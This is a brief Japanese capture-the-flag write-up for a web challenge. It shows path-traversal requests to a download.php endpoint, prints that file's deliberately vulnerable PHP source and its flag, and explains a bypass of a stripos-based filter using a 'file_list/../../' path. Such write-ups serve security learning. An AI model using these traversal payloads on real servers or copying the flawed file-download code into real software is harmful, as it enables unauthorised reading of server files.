動的scoringと基本点の結果によりWelcome問より得点が低いの好き。

solution

1

http://fup.chal.ctf.westerns.tokyo/download.php?f=../index.php のようにすればindex.php, download.phpが取れる。

download.php:

<?php
// TWCTF{then_can_y0u_read_file_list?}
$filename = $_GET['f'];
if(stripos($filename, 'file_list') != false) die();
header("Contest-Type: application/octet-stream");
header("Content-Disposition: attachment; filename='$filename'");
readfile("uploads/$filename");

2

file_list.phpを読みたいが普通に読みにいくと弾かれる。

stripos($filename, 'file_list') != false してるがstriposが返すのはindexなので: http://fup.chal.ctf.westerns.tokyo/download.php?f=file_list/../../file_list.php